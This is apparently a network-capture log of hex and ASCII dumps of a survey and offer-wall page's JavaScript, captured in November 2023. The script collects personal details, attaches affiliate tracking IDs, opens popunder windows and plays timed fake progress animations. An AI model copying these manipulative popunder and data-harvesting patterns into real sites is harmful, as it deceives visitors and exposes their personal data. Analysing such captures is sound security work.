                                                                          2023-11-21 16:58:41 UTC566INData Raw: 37 63 36 38 0d 0a 6c 65 74 20 24 63 75 72 72 3b 0a 6c 65 74 20 64 61 74 61 20 3d 20 7b 7d 3b 0a 6c 65 74 20 70 65 72 63 65 6e 74 62 61 72 3d 30 3b 0a 6c 65 74 20 73 75 72 76 65 79 69 64 3d 22 22 3b 0a 76 61 72 20 61 74 74 72 43 68 6f 69 63 65 73 3d 24 28 27 23 64 76 2d 63 68 6f 69 63 65 73 27 29 2e 61 74 74 72 28 27 73 69 64 27 29 3b 0a 76 61 72 20 64 6f 6d 61 69 6e 3d 27 65 78 63 69 74 65 2e 6f 73 72 61 6d 6c 75 6d 65 6e 73 2e 63 6f 6d 27 3b 0a 76 61 72 20 70 69 70 65 6c 69 6e 65 3d 27 73 61 75 2e 62 62 63 72 79 73 74 61 6c 2e 63 6f 6d 27 3b 0a 76 61 72 20 7a 69 70 63 6f 64 65 3d 22 22 3b 0a 76 61 72 20 73 74 61 74 65 5f 73 65 6c 65 63 74 65 64 3d 22 22 3b 0a 76 61 72 20 73 6b 69 70 5f 6d 6f 64 61 6c 5f 65 6d 61 69 6c 3d 66 61 6c 73 65 3b 0a 76 61 72 20
                                                                          Data Ascii: 7c68let $curr;let data = {};let percentbar=0;let surveyid="";var attrChoices=$('#dv-choices').attr('sid');var domain='excite.osramlumens.com';var pipeline='sau.bbcrystal.com';var zipcode="";var state_selected="";var skip_modal_email=false;var
                                                                          2023-11-21 16:58:41 UTC567INData Raw: 6e 64 69 61 6e 61 22 2c 22 49 41 22 3a 22 49 6f 77 61 22 2c 22 4b 53 22 3a 22 4b 61 6e 73 61 73 22 2c 22 4b 59 22 3a 22 4b 65 6e 74 75 63 6b 79 22 2c 22 4c 41 22 3a 22 4c 6f 75 69 73 69 61 6e 61 22 2c 22 4d 45 22 3a 22 4d 61 69 6e 65 22 2c 20 22 4d 44 22 3a 22 4d 61 72 79 6c 61 6e 64 22 2c 20 22 4d 41 22 3a 22 4d 61 73 73 61 63 68 75 73 65 74 74 73 22 2c 20 22 4d 49 22 3a 22 4d 69 63 68 69 67 61 6e 22 2c 20 22 4d 4e 22 3a 22 4d 69 6e 6e 65 73 6f 74 61 22 2c 20 22 4d 53 22 3a 22 4d 69 73 73 69 73 73 69 70 70 69 22 2c 20 22 4d 4f 22 3a 22 4d 69 73 73 6f 75 72 69 22 2c 20 22 4d 54 22 3a 22 4d 6f 6e 74 61 6e 61 22 2c 22 4e 45 22 3a 22 4e 65 62 72 61 73 6b 61 22 2c 22 4e 56 22 3a 22 4e 65 76 61 64 61 22 2c 22 4e 48 22 3a 22 4e 65 77 20 48 61 6d 70 73 68 69 72
                                                                          Data Ascii: ndiana","IA":"Iowa","KS":"Kansas","KY":"Kentucky","LA":"Louisiana","ME":"Maine", "MD":"Maryland", "MA":"Massachusetts", "MI":"Michigan", "MN":"Minnesota", "MS":"Mississippi", "MO":"Missouri", "MT":"Montana","NE":"Nebraska","NV":"Nevada","NH":"New Hampshir
                                                                          2023-11-21 16:58:41 UTC568INData Raw: 2e 69 73 4e 75 6d 65 72 69 63 28 61 74 74 72 43 68 6f 69 63 65 73 29 29 7b 0a 20 20 20 73 75 72 76 65 79 69 64 3d 24 28 27 23 64 76 2d 63 68 6f 69 63 65 73 27 29 2e 61 74 74 72 28 27 73 69 64 27 29 3b 0a 7d 0a 66 75 6e 63 74 69 6f 6e 20 62 69 72 74 68 64 61 79 46 69 6c 6c 28 29 7b 0a 09 2f 2a 62 69 72 74 68 64 61 79 2a 2f 0a 09 76 61 72 20 6d 6f 6e 74 68 3d 20 5b 22 4a 61 6e 75 61 72 79 22 2c 20 22 46 65 62 72 75 61 72 79 22 2c 20 22 4d 61 72 63 68 22 2c 20 22 41 70 72 69 6c 22 2c 20 22 4d 61 79 22 2c 20 22 4a 75 6e 65 22 2c 20 22 4a 75 6c 79 22 2c 20 22 41 75 67 75 73 74 22 2c 20 22 53 65 70 74 65 6d 62 65 72 22 2c 20 22 4f 63 74 6f 62 65 72 22 2c 20 22 4e 6f 76 65 6d 62 65 72 22 2c 20 22 44 65 63 65 6d 62 65 72 22 5d 3b 0a 09 76 61 72 20 79 65 61 72 3d
                                                                          Data Ascii: .isNumeric(attrChoices)){ surveyid=$('#dv-choices').attr('sid');}function birthdayFill(){/*birthday*/var month= ["January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December"];var year=
                                                                          2023-11-21 16:58:41 UTC569INData Raw: 76 45 6d 61 69 6c 3d 3d 33 20 7c 7c 20 61 64 76 45 6d 61 69 6c 3d 3d 34 29 7b 0a 09 09 24 28 27 2e 64 75 65 5f 68 2c 20 2e 74 65 78 74 32 54 27 29 2e 68 69 64 65 28 29 3b 0a 09 09 24 28 27 2e 74 65 78 74 32 54 2e 74 78 32 74 27 29 2e 73 68 6f 77 28 29 3b 0a 09 7d 0a 09 69 66 28 24 28 27 23 6d 6f 64 61 6c 5f 65 6d 61 69 6c 27 29 2e 6c 65 6e 67 74 68 3e 30 20 26 26 20 6c 70 6f 77 3d 3d 27 38 27 20 26 26 20 74 79 70 65 6f 66 20 74 65 6d 70 6c 61 74 65 56 65 72 73 69 6f 6e 4e 61 6d 65 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 20 26 26 20 74 65 6d 70 6c 61 74 65 56 65 72 73 69 6f 6e 4e 61 6d 65 3d 3d 27 31 2e 34 2d 70 6f 70 75 6e 64 65 72 45 6d 61 69 6c 27 29 7b 0a 09 09 76 61 72 20 69 64 5f 6d 6f 64 61 6c 5f 65 6d 61 69 6c 3d 24 28 27 23 70 73 65 6c 5f
                                                                          Data Ascii: vEmail==3 || advEmail==4){$('.due_h, .text2T').hide();$('.text2T.tx2t').show();}if($('#modal_email').length>0 && lpow=='8' && typeof templateVersionName !== 'undefined' && templateVersionName=='1.4-popunderEmail'){var id_modal_email=$('#psel_
                                                                          2023-11-21 16:58:41 UTC571INData Raw: 6c 6f 72 27 3a 27 23 30 33 34 44 41 32 27 7d 29 3b 0a 20 20 7d 2c 20 31 35 30 30 29 3b 0a 20 20 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 24 28 22 23 76 32 61 2c 23 76 32 62 22 29 2e 68 69 64 65 28 29 3b 0a 20 20 20 20 24 28 22 23 76 32 63 2c 23 76 33 62 22 29 2e 73 68 6f 77 28 29 3b 0a 09 24 28 27 23 66 63 32 27 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 27 66 61 2d 63 69 72 63 6c 65 27 29 2e 61 64 64 43 6c 61 73 73 28 27 66 61 2d 63 68 65 63 6b 2d 63 69 72 63 6c 65 27 29 3b 0a 09 24 28 22 23 76 32 62 2e 62 6c 22 29 2e 63 73 73 28 7b 27 63 6f 6c 6f 72 27 3a 27 23 30 30 30 27 7d 29 3b 0a 09 24 28 27 23 66 63 33 27 29 2e 63 73 73 28 7b 27 63 6f 6c 6f 72 27 3a 27 23 30 33 34 44 41 32 27 7d 29 3b 0a 20 20 7d 2c 20 33
                                                                          Data Ascii: lor':'#034DA2'}); }, 1500); setTimeout(function() { $("#v2a,#v2b").hide(); $("#v2c,#v3b").show();$('#fc2').removeClass('fa-circle').addClass('fa-check-circle');$("#v2b.bl").css({'color':'#000'});$('#fc3').css({'color':'#034DA2'}); }, 3
                                                                          2023-11-21 16:58:41 UTC572INData Raw: 24 28 27 2e 70 72 6f 67 72 65 73 73 2d 62 61 72 2e 64 75 62 27 29 2e 63 73 73 28 7b 27 77 69 64 74 68 27 3a 27 31 30 30 25 27 7d 29 3b 0a 09 63 6f 75 6e 74 5f 70 28 29 3b 0a 09 73 65 74 54 69 6d 65 6f 75 74 28 0a 09 09 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 09 09 09 24 28 27 2e 63 68 65 63 6b 31 27 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 27 66 61 2d 73 70 69 6e 6e 65 72 20 66 61 2d 73 70 69 6e 27 29 2e 61 64 64 43 6c 61 73 73 28 27 66 61 2d 63 68 65 63 6b 2d 63 69 72 63 6c 65 27 29 2e 73 68 6f 77 28 29 3b 0a 09 09 09 24 28 27 2e 6c 6f 61 64 5f 74 65 78 74 31 2e 6c 6f 61 64 74 78 73 74 72 69 70 27 29 2e 63 73 73 28 7b 27 63 6f 6c 6f 72 27 3a 27 23 65 34 65 33 65 33 27 7d 29 3b 0a 09 09 09 24 28 27 23 70 65 72 63 65 6e 74 5f 73 27 29 2e 68 74 6d 6c 28 27 33
                                                                          Data Ascii: $('.progress-bar.dub').css({'width':'100%'});count_p();setTimeout(function(){$('.check1').removeClass('fa-spinner fa-spin').addClass('fa-check-circle').show();$('.load_text1.loadtxstrip').css({'color':'#e4e3e3'});$('#percent_s').html('3
                                                                          2023-11-21 16:58:41 UTC573INData Raw: 63 6f 6c 6f 72 20 62 74 6e 2d 74 78 20 62 68 2d 63 6f 6c 6f 72 22 3e 27 2b 76 2e 61 6e 73 77 65 72 54 65 78 74 2b 27 3c 2f 62 75 74 74 6f 6e 3e 27 29 0a 20 20 20 20 20 20 2e 66 61 64 65 49 6e 28 29 3b 0a 20 20 20 20 7d 29 3b 0a 7d 0a 0a 66 75 6e 63 74 69 6f 6e 20 73 65 6e 64 4f 66 28 69 64 65 6d 2c 73 6b 69 70 41 64 76 45 6d 61 69 6c 3d 66 61 6c 73 65 29 7b 0a 09 76 61 72 20 75 72 6c 20 3d 20 24 28 27 23 6f 70 2d 27 2b 69 64 65 6d 29 2e 61 74 74 72 28 27 64 61 74 61 2d 69 64 27 29 3b 0a 09 75 72 6c 20 3d 20 72 65 70 6c 61 63 65 55 72 6c 50 61 72 61 6d 28 75 72 6c 2c 20 27 73 31 27 2c 20 61 66 66 5f 69 64 29 3b 0a 09 75 72 6c 20 3d 20 72 65 70 6c 61 63 65 55 72 6c 50 61 72 61 6d 28 75 72 6c 2c 20 27 73 32 27 2c 20 63 6c 69 63 6b 5f 69 64 29 3b 0a 09 75 72
                                                                          Data Ascii: color btn-tx bh-color">'+v.answerText+'</button>') .fadeIn(); });}function sendOf(idem,skipAdvEmail=false){var url = $('#op-'+idem).attr('data-id');url = replaceUrlParam(url, 's1', aff_id);url = replaceUrlParam(url, 's2', click_id);ur
                                                                          2023-11-21 16:58:41 UTC575INData Raw: 70 75 6e 64 65 72 5f 72 65 66 72 65 73 68 5f 69 64 27 5d 3b 0a 09 09 69 66 28 70 5f 73 65 6c 3d 3d 31 31 29 7b 0a 09 09 20 20 73 69 64 5f 70 6f 70 75 6e 64 65 72 3d 36 31 35 35 3b 0a 09 09 20 20 69 66 28 6c 70 6f 77 21 3d 27 38 27 29 7b 0a 09 09 09 20 20 61 72 72 5f 70 6f 70 75 6e 64 65 72 73 5b 27 75 72 6c 73 27 5d 3d 22 22 3b 0a 09 09 20 20 7d 0a 09 09 7d 0a 09 7d 0a 09 69 66 28 74 79 70 65 6f 66 20 61 72 72 5f 70 6f 70 75 6e 64 65 72 73 5b 27 75 72 6c 73 27 5d 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 20 26 26 20 61 72 72 5f 70 6f 70 75 6e 64 65 72 73 5b 27 75 72 6c 73 27 5d 21 3d 3d 27 27 20 26 26 20 28 61 64 76 45 6d 61 69 6c 3d 3d 33 20 7c 7c 20 61 64 76 45 6d 61 69 6c 3d 3d 34 20 7c 7c c2 a0 61 64 76 45 6d 61 69 6c 3d 3d 30 29 29 7b 0a 09 09
                                                                          Data Ascii: punder_refresh_id'];if(p_sel==11){ sid_popunder=6155; if(lpow!='8'){ arr_popunders['urls']=""; }}}if(typeof arr_popunders['urls'] !== 'undefined' && arr_popunders['urls']!=='' && (advEmail==3 || advEmail==4 ||advEmail==0)){
                                                                          2023-11-21 16:58:41 UTC576INData Raw: 27 70 6f 70 75 6e 64 65 72 5f 6d 6f 64 65 27 5d 5b 30 5d 5b 27 70 6f 70 75 6e 64 65 72 5f 72 65 66 72 65 73 68 5f 69 64 27 5d 20 26 26 20 61 72 72 5f 70 6f 70 75 6e 64 65 72 73 5b 27 70 6f 70 75 6e 64 65 72 5f 6d 6f 64 65 27 5d 5b 30 5d 5b 27 74 79 70 65 27 5d 3d 3d 32 20 7c 7c 20 61 72 72 5f 70 6f 70 75 6e 64 65 72 73 5b 27 70 6f 70 75 6e 64 65 72 5f 6d 6f 64 65 27 5d 5b 30 5d 5b 27 74 79 70 65 27 5d 3d 3d 30 29 7b 0a 09 09 09 09 09 09 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 76 61 6c 75 65 29 3b 0a 09 09 09 09 09 7d 65 6c 73 65 7b 0a 09 09 09 09 09 09 77 69 6e 64 6f 77 2e 6f 70 65 6e 28 76 61 6c 75 65 2c 20 27 5f 62 6c 61 6e 6b 27 29 3b 09 0a 09 09 09 09 09 7d 0a 09 09 09 09 7d 0a 09 09 09 7d 29 3b 0a 09 09 7d 0a 09 7d 0a
                                                                          Data Ascii: 'popunder_mode'][0]['popunder_refresh_id'] && arr_popunders['popunder_mode'][0]['type']==2 || arr_popunders['popunder_mode'][0]['type']==0){window.location.replace(value);}else{window.open(value, '_blank');}}});}}
                                                                          2023-11-21 16:58:41 UTC577INData Raw: 44 3a 6c 70 6f 77 2c 0a 09 09 09 09 6f 66 66 65 72 49 44 3a 20 70 72 5b 30 5d 2c 0a 09 09 09 09 69 6d 61 67 65 49 44 3a 20 70 72 5b 31 5d 2c 0a 09 09 09 09 6f 66 66 65 72 50 6f 73 69 74 69 6f 6e 3a 20 70 72 5b 32 5d 2c 0a 09 09 09 09 6f 66 66 65 72 57 61 6c 6c 4e 61 6d 65 3a 20 24 28 27 23 6f 70 2d 27 2b 69 64 65 6d 29 2e 66 69 6e 64 28 27 69 6e 70 75 74 5b 6e 61 6d 65 3d 6f 5f 6e 61 6d 65 5d 27 29 2e 76 61 6c 28 29 2c 0a 09 09 09 09 6f 66 66 65 72 4e 61 6d 65 3a 20 24 28 27 23 6f 70 2d 27 2b 69 64 65 6d 29 2e 66 69 6e 64 28 27 69 6e 70 75 74 5b 6e 61 6d 65 3d 70 5f 6e 61 6d 65 5d 27 29 2e 76 61 6c 28 29 2c 0a 09 09 09 09 69 6d 61 67 65 4e 61 6d 65 3a 20 69 6e 61 6d 65 2c 0a 09 09 09 09 74 49 44 3a 20 24 28 27 23 6f 70 2d 27 2b 69 64 65 6d 29 2e 66 69 6e
                                                                          Data Ascii: D:lpow,offerID: pr[0],imageID: pr[1],offerPosition: pr[2],offerWallName: $('#op-'+idem).find('input[name=o_name]').val(),offerName: $('#op-'+idem).find('input[name=p_name]').val(),imageName: iname,tID: $('#op-'+idem).fin
                                                                          2023-11-21 16:58:41 UTC579INData Raw: 5f 65 6d 61 69 6c 5f 70 6f 70 75 70 27 29 2e 6d 6f 64 61 6c 28 27 73 68 6f 77 27 29 3b 0a 09 09 09 09 24 28 27 23 6d 6f 64 61 6c 5f 70 6e 61 6d 65 27 29 2e 68 74 6d 6c 28 24 28 27 23 6f 70 2d 27 2b 69 64 65 6d 29 2e 66 69 6e 64 28 27 69 6e 70 75 74 5b 6e 61 6d 65 3d 70 5f 6e 61 6d 65 5d 27 29 2e 76 61 6c 28 29 29 3b 0a 09 09 09 09 24 28 27 2e 70 6e 5f 72 65 64 69 72 27 29 2e 68 74 6d 6c 28 24 28 27 23 6f 70 2d 27 2b 69 64 65 6d 29 2e 66 69 6e 64 28 27 69 6e 70 75 74 5b 6e 61 6d 65 3d 70 5f 6e 61 6d 65 5d 27 29 2e 76 61 6c 28 29 29 3b 20 0a 09 09 09 7d 65 6c 73 65 7b 0a 09 09 09 09 73 65 6e 64 4f 66 28 69 64 65 6d 29 3b 0a 09 09 09 7d 0a 09 09 7d 0a 20 20 7d 29 3b 0a 0a 20 20 69 66 28 24 28 27 2e 64 61 74 65 68 61 78 27 29 2e 6c 65 6e 67 74 68 29 7b 0a 20
                                                                          Data Ascii: _email_popup').modal('show');$('#modal_pname').html($('#op-'+idem).find('input[name=p_name]').val());$('.pn_redir').html($('#op-'+idem).find('input[name=p_name]').val()); }else{sendOf(idem);}} }); if($('.datehax').length){
                                                                          2023-11-21 16:58:41 UTC580INData Raw: 75 72 61 74 69 6f 6e 3a 20 31 30 30 30 2c 0a 09 09 09 09 20 20 65 61 73 69 6e 67 3a 27 73 77 69 6e 67 27 2c 20 2f 2f 20 63 61 6e 20 62 65 20 61 6e 79 74 68 69 6e 67 0a 09 09 09 09 20 20 73 74 65 70 3a 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 2f 2f 20 63 61 6c 6c 65 64 20 6f 6e 20 65 76 65 72 79 20 73 74 65 70 0a 09 09 09 09 09 20 20 2f 2f 20 55 70 64 61 74 65 20 74 68 65 20 65 6c 65 6d 65 6e 74 27 73 20 74 65 78 74 20 77 69 74 68 20 72 6f 75 6e 64 65 64 2d 75 70 20 76 61 6c 75 65 3a 0a 09 09 09 09 09 20 20 24 28 27 2e 70 62 2d 70 65 72 63 65 6e 74 27 29 2e 74 65 78 74 28 4d 61 74 68 2e 72 6f 75 6e 64 28 74 68 69 73 2e 73 6f 6d 65 56 61 6c 75 65 29 29 3b 0a 09 09 09 09 20 20 7d 0a 09 09 09 20 20 7d 29 3b 09 0a 09 09 09 09 24 28 27 2e 73 70 72 6f 67 72 65
                                                                          Data Ascii: uration: 1000, easing:'swing', // can be anything step: function() { // called on every step // Update the element's text with rounded-up value: $('.pb-percent').text(Math.round(this.someValue)); } });$('.sprogre
                                                                          2023-11-21 16:58:41 UTC581INData Raw: 2f 0a 09 09 09 09 09 24 28 22 2e 73 70 72 6f 67 72 65 73 73 62 61 72 22 29 2e 73 6c 69 64 65 44 6f 77 6e 28 29 3b 0a 09 09 09 09 09 24 28 22 23 71 75 65 73 74 69 6f 6e 54 65 78 74 22 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 27 65 6d 61 69 6c 2d 74 69 74 6c 65 27 29 3b 0a 09 09 09 09 09 24 28 22 23 71 75 65 73 74 69 6f 6e 46 6f 6f 74 65 72 22 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 27 65 6d 61 69 6c 2d 73 75 62 27 29 3b 0a 09 09 09 09 09 24 28 22 23 71 75 65 73 74 69 6f 6e 54 65 78 74 22 29 2e 61 70 70 65 6e 64 28 64 2e 71 75 65 73 74 69 6f 6e 54 65 78 74 29 3b 0a 09 09 09 09 09 0a 09 09 09 09 09 73 77 69 74 63 68 54 79 70 65 51 75 65 73 74 69 6f 6e 73 28 64 29 3b 0a 09 09 09 09 09 0a 09 09 09 09 09 2f 2f 70 72 6f 67 72 65 73 73 20 63 6f 6e 74 69 6e 75
                                                                          Data Ascii: /$(".sprogressbar").slideDown();$("#questionText").removeClass('email-title');$("#questionFooter").removeClass('email-sub');$("#questionText").append(d.questionText);switchTypeQuestions(d);//progress continu
                                                                          2023-11-21 16:58:41 UTC583INData Raw: 09 09 20 20 7d 0a 09 09 09 09 09 20 20 7d 29 3b 0a 09 09 09 09 09 6d 66 71 5f 74 61 67 73 28 27 6c 61 73 74 2d 71 75 65 73 74 69 6f 6e 27 29 3b 0a 09 09 09 09 09 73 68 6f 77 4f 66 66 65 72 57 61 6c 6c 28 29 3b 0a 09 09 09 09 7d 0a 09 09 09 09 63 68 65 65 72 73 28 70 72 6f 67 72 65 73 73 29 3b 0a 09 09 09 7d 0a 09 09 7d 29 3b 0a 09 7d 0a 0a 66 75 6e 63 74 69 6f 6e 20 66 6f 72 6d 61 74 50 68 6f 6e 65 4e 75 6d 62 65 72 28 70 68 6f 6e 65 4e 75 6d 62 65 72 53 74 72 69 6e 67 29 20 7b 0a 20 20 76 61 72 20 63 6c 65 61 6e 65 64 20 3d 20 28 27 27 20 2b 20 70 68 6f 6e 65 4e 75 6d 62 65 72 53 74 72 69 6e 67 29 2e 72 65 70 6c 61 63 65 28 2f 5c 44 2f 67 2c 20 27 27 29 3b 0a 20 20 76 61 72 20 6d 61 74 63 68 20 3d 20 63 6c 65 61 6e 65 64 2e 6d 61 74 63 68 28 2f 5e 28 5c
                                                                          Data Ascii: } });mfq_tags('last-question');showOfferWall();}cheers(progress);}});}function formatPhoneNumber(phoneNumberString) { var cleaned = ('' + phoneNumberString).replace(/\D/g, ''); var match = cleaned.match(/^(\
                                                                          2023-11-21 16:58:41 UTC584INData Raw: 65 72 73 56 61 6c 75 65 73 2b 3d 27 2c 27 2b 64 2e 61 6e 73 77 65 72 73 5b 69 5d 2e 76 61 6c 75 65 3b 0a 09 09 09 7d 0a 09 09 7d 0a 09 09 0a 09 09 69 66 28 64 2e 61 6e 73 77 65 72 73 5b 69 5d 2e 76 61 6c 75 65 21 3d 27 53 6b 69 70 27 20 26 26 20 64 2e 61 6e 73 77 65 72 73 5b 69 5d 2e 76 61 6c 75 65 21 3d 27 73 6b 69 70 27 29 7b 0a 09 09 09 24 28 22 23 71 75 65 73 74 69 6f 6e 54 65 78 74 22 29 2e 63 73 73 28 7b 27 6d 61 72 67 69 6e 2d 74 6f 70 27 3a 27 30 27 7d 29 3b 0a 09 09 09 73 77 69 74 63 68 28 64 2e 61 6e 73 77 65 72 73 5b 69 5d 2e 61 63 74 69 6f 6e 54 79 70 65 29 7b 0a 09 09 09 09 63 61 73 65 20 33 3a 0a 09 09 09 09 09 2f 2a 20 24 28 22 23 63 6f 6e 74 61 69 6e 65 72 2d 73 75 72 76 65 79 22 29 2e 63 73 73 28 7b 62 61 63 6b 67 72 6f 75 6e 64 49 6d 61
                                                                          Data Ascii: ersValues+=','+d.answers[i].value;}}if(d.answers[i].value!='Skip' && d.answers[i].value!='skip'){$("#questionText").css({'margin-top':'0'});switch(d.answers[i].actionType){case 3:/* $("#container-survey").css({backgroundIma
                                                                          2023-11-21 16:58:41 UTC585INData Raw: 66 61 6c 73 65 22 20 76 61 6c 75 65 3d 22 60 2b 70 68 6f 6e 65 55 52 4c 2b 60 22 0a 09 09 09 09 09 09 09 09 6f 6e 6b 65 79 70 72 65 73 73 20 3d 22 72 65 74 75 72 6e 20 61 6c 70 68 61 28 65 76 65 6e 74 29 3b 22 0a 09 09 09 09 09 09 09 09 6f 6e 6b 65 79 75 70 3d 22 09 76 61 72 20 6e 76 61 6c 3d 20 64 61 73 68 65 64 4e 75 6d 62 65 72 28 74 68 69 73 29 3b 0a 09 09 09 09 09 09 09 09 09 09 09 76 61 72 20 70 61 74 74 20 3d 20 6e 65 77 20 52 65 67 45 78 70 28 27 5b 30 2d 39 5d 7b 33 7d 5b 20 2d 5d 7b 30 2c 31 7d 5b 30 2d 39 5d 7b 33 7d 5b 20 2d 5d 7b 30 2c 31 7d 5b 30 2d 39 5d 7b 34 7d 27 29 3b 0a 09 09 09 09 09 09 09 09 09 09 09 76 61 72 20 72 65 73 20 3d 20 70 61 74 74 2e 74 65 73 74 28 6e 76 61 6c 29 3b 0a 09 09 09 09 09 09 09 09 09 09 09 69 66 28 74 68 69 73
                                                                          Data Ascii: false" value="`+phoneURL+`"onkeypress ="return alpha(event);"onkeyup="var nval= dashedNumber(this);var patt = new RegExp('[0-9]{3}[ -]{0,1}[0-9]{3}[ -]{0,1}[0-9]{4}');var res = patt.test(nval);if(this
                                                                          2023-11-21 16:58:41 UTC587INData Raw: 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 74 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 09 09 09 09 09 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 6c 6f 63 61 74 69 6f 6e 2d 61 72 72 6f 77 22 3e 3c 2f 69 3e 0a 09 09 09 09 09 09 09 09 3c 69 6e 70 75 74 20 69 64 3d 22 7a 69 70 2d 64 61 74 61 22 20 76 61 6c 75 65 3d 22 60 2b 7a 69 70 63 6f 64 65 55 52 4c 2b 60 22 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 2d 64 61 74 61 22 20 64 61 74 61 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 6e 75 6d 62 65 72 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 5a 69 70 20 43 6f 64 65 22 20 0a 09 09 09 09 09 09 09 09 6f 6e 69 6e 70 75 74 3d 22 6a 61 76 61 73 63 72
                                                                          Data Ascii: class="input-container"><div class="state-container"><i class="fas fa-location-arrow"></i><input id="zip-data" value="`+zipcodeURL+`" class="input-data" data="false" type="number" placeholder="Zip Code" oninput="javascr
                                                                          2023-11-21 16:58:41 UTC588INData Raw: 72 61 63 6b 54 6f 6b 65 6e 2b 60 27 2c 60 2b 73 75 72 76 65 79 69 64 2b 60 2c 60 2b 64 2e 71 75 65 73 74 69 6f 6e 49 44 2b 60 2c 60 2b 64 2e 61 6e 73 77 65 72 73 5b 69 5d 2e 61 6e 73 77 65 72 49 44 2b 60 2c 27 60 2b 64 2e 66 6f 72 6d 4e 61 6d 65 2b 60 27 2c 27 60 2b 64 2e 61 6e 73 77 65 72 73 5b 69 5d 2e 76 61 6c 75 65 2b 60 27 29 22 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 60 2b 24 28 27 23 73 75 62 6d 69 74 2d 6c 61 6e 67 27 29 2e 76 61 6c 28 29 2b 60 3c 2f 62 75 74 74 6f 6e 3e 60 29 3b 0a 09 09 09 09 09 09 69 6e 70 75 74 73 2b 2b 3b 0a 09 09 09 09 09 09 76 61 6c 5a 3d 74 72 75 65 3b 0a 09 09 09 09 09 09 0a 09 09 09 09 62 72 65 61 6b 3b 0a 09 09 09 09 63 61 73 65 20 31 31 3a 0a 09 09 09 09 09 09 24 28 27 23 71 75 65 73 74 69 6f 6e 42 6f 64 79 27 29
                                                                          Data Ascii: rackToken+`',`+surveyid+`,`+d.questionID+`,`+d.answers[i].answerID+`,'`+d.formName+`','`+d.answers[i].value+`')" type="button">`+$('#submit-lang').val()+`</button>`);inputs++;valZ=true;break;case 11:$('#questionBody')
                                                                          2023-11-21 16:58:41 UTC589INData Raw: 29 7b 0a 09 09 09 09 09 09 76 61 72 20 6e 75 6d 5f 73 66 3d 74 68 69 73 2e 76 61 6c 75 65 3b 0a 09 09 09 09 09 09 76 61 72 20 6e 75 6d 5f 63 66 3d 27 27 0a 09 09 09 09 09 09 6e 75 6d 5f 63 66 3d 6e 75 6d 5f 73 66 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 32 29 0a 09 09 09 09 09 09 74 68 69 73 2e 76 61 6c 75 65 3d 6e 75 6d 5f 63 66 3b 0a 09 09 09 09 09 09 7d 0a 09 09 09 09 09 09 69 66 28 74 68 69 73 2e 76 61 6c 75 65 3e 31 31 29 7b 0a 09 09 09 09 09 09 09 74 68 69 73 2e 76 61 6c 75 65 3d 27 27 3b 0a 09 09 09 09 09 09 7d 22 0a 09 09 09 09 09 6f 6e 6b 65 79 70 72 65 73 73 20 3d 22 72 65 74 75 72 6e 20 61 6c 70 68 61 28 65 76 65 6e 74 29 3b 22 0a 09 09 09 09 09 6f 6e 74 6f 75 63 68 73 74 61 72 74 3d 22 74 68 69 73 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65
                                                                          Data Ascii: ){var num_sf=this.value;var num_cf=''num_cf=num_sf.substring(0,2)this.value=num_cf;}if(this.value>11){this.value='';}"onkeypress ="return alpha(event);"ontouchstart="this.removeAttribute
                                                                          2023-11-21 16:58:41 UTC591INData Raw: 6f 6e 20 69 64 3d 22 77 65 69 67 68 74 2d 64 61 74 61 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 63 6f 6e 74 69 6e 75 65 5f 73 20 62 74 6e 20 62 74 6e 2d 64 61 6e 67 65 72 22 20 6f 6e 43 6c 69 63 6b 3d 22 76 61 6c 69 64 61 74 65 57 65 69 67 68 74 28 27 60 2b 64 2e 74 72 61 63 6b 54 6f 6b 65 6e 2b 60 27 2c 60 2b 73 75 72 76 65 79 69 64 2b 60 2c 60 2b 64 2e 71 75 65 73 74 69 6f 6e 49 44 2b 60 2c 60 2b 64 2e 61 6e 73 77 65 72 73 5b 69 5d 2e 61 6e 73 77 65 72 49 44 2b 60 2c 27 60 2b 64 2e 66 6f 72 6d 4e 61 6d 65 2b 60 27 2c 27 60 2b 64 2e 61 6e 73 77 65 72 73 5b 69 5d 2e 76 61 6c 75 65 2b 60 27 29 22 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 4e 65 78 74 3c 2f 62 75 74 74 6f 6e 3e 60 29 3b 0a 09 09 09 09 09 69 6e 70 75 74 73 2b 2b 3b 0a 09 09 09 09 09 76 61 6c
                                                                          Data Ascii: on id="weight-data-btn" class="continue_s btn btn-danger" onClick="validateWeight('`+d.trackToken+`',`+surveyid+`,`+d.questionID+`,`+d.answers[i].answerID+`,'`+d.formName+`','`+d.answers[i].value+`')" type="button">Next</button>`);inputs++;val
